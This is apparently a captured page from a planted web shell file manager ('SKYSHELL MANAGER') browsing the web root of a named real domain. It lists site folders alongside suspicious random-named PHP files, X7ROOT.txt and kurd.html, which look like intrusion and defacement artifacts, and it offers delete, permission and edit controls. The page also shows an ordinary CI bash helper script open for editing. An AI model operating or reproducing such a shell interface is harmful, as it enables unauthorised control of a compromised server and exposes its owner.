📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: functions.sh
#!/usr/bin/env bash set -e RESET=$(echo -e "\\033[0m") BOLD=$(echo -e "\\033[1m") YELLOW=$(echo -e "\\033[33m") BLUE_BG=$(echo -e "\\033[44m") function header() { local title="$1" echo "${BLUE_BG}${YELLOW}${BOLD}${title}${RESET}" echo "------------------------------------------" } function header2() { local title="$1" echo "### ${BOLD}${title}${RESET}" echo } function run() { echo "+ $*" "$@" } function run_exec() { echo "+ exec $*" exec "$@" } function retry_run() { local reset='\x1B[0m' local red='\x1B[31m' local yellow='\x1B[33m' local max_tries="$1" local number=2 shift echo "+ $*" while true; do if "$@"; then return 0 elif [[ $number -le $max_tries ]]; then echo -e "${yellow}The command \"$*\" failed. Retrying, $number of $max_tries:${reset}" (( number++ )) else echo -e "${red}The command \"$*\" failed after $max_tries attempts. Giving up.${reset}" return 1 fi done } function require_envvar() { local name="$1" local value="$2" if [[ "$value" = "" ]]; then echo "ERROR: the environment variable '$name' is required." exit 1 fi } function autodetect_environment() { echo "Environment autodetection results:" if [[ -e /usr/bin/sw_vers ]]; then echo "Operating system: macOS" export OS=macos else echo "Operating system: Linux" export OS=linux fi if [ "${GITHUB_ACTIONS:-false}" = "true" ]; then echo "Running in Github Actions: yes" export CACHE_DIR="$RUNNER_TOOL_CACHE/$GITHUB_JOB/$RUNNER_OS" elif [[ "$JENKINS_HOME" != "" ]]; then echo "Running in Jenkins: yes" export IN_JEKINS=true if [ $OS = "linux" ]; then export CACHE_DIR="$JENKINS_HOME/cache/$JOB_NAME/executor-$EXECUTOR_NUMBER" else require_envvar WORKSPACE "$WORKSPACE" export CACHE_DIR="$WORKSPACE/cache/$JOB_NAME/executor-$EXECUTOR_NUMBER" fi else echo "Running in CI: no" export IN_JENKINS=false export CACHE_DIR="$PASSENGER_ROOT/.ci_cache" fi echo "Cache directory: $CACHE_DIR" } function sanity_check_environment() { if $IN_JENKINS; then if [[ "$JOB_NAME" = "" ]]; then echo "ERROR: Jenkins environment detected, but JOB_NAME environment variable not set." >&2 return 1 fi if [[ "$EXECUTOR_NUMBER" = "" ]]; then echo "ERROR: Jenkins environment detected, but EXECUTOR_NUMBER environment variable not set." >&2 return 1 fi elif [ "${GITHUB_ACTIONS:-false}" = "true" ]; then if [ -z "$GITHUB_JOB" ]; then echo "ERROR: Github Actions environment detected, but GITHUB_JOB environment variable not set." >&2 return 1 else export "JOB_NAME=$GITHUB_JOB" fi if [ -z "$GITHUB_RUN_ID" ]; then echo "ERROR: Github Actions environment detected, but GITHUB_RUN_ID environment variable not set." >&2 return 1 else export "EXECUTOR_NUMBER=$GITHUB_RUN_ID" fi fi } # The following is necessary to make the C++ tests work. # They invoke Ruby scripts which require gems installed # by Bundler, but these scripts are not invoked with # Bundler, so they can only find these gems through GEM_PATH. function add_bundler_path_to_gem_path() { local bundle_path if bundle_path=$(bundle show rake); then bundle_path=$(dirname "$bundle_path") bundle_path=$(dirname "$bundle_path") echo "Adding $bundle_path to GEM_PATH" export GEM_PATH="$bundle_path:$GEM_PATH" local bundle_bin_path="$bundle_path/bin" echo "Adding $bundle_bin_path to PATH" export PATH="$bundle_bin_path:$PATH" fi } function _cleanup() { set +e local pids pids=$(jobs -p) if [[ "$pids" != "" ]]; then # shellcheck disable=SC2086 kill $pids 2>/dev/null fi if [[ $(type -t cleanup) == function ]]; then cleanup fi } trap _cleanup EXIT
Save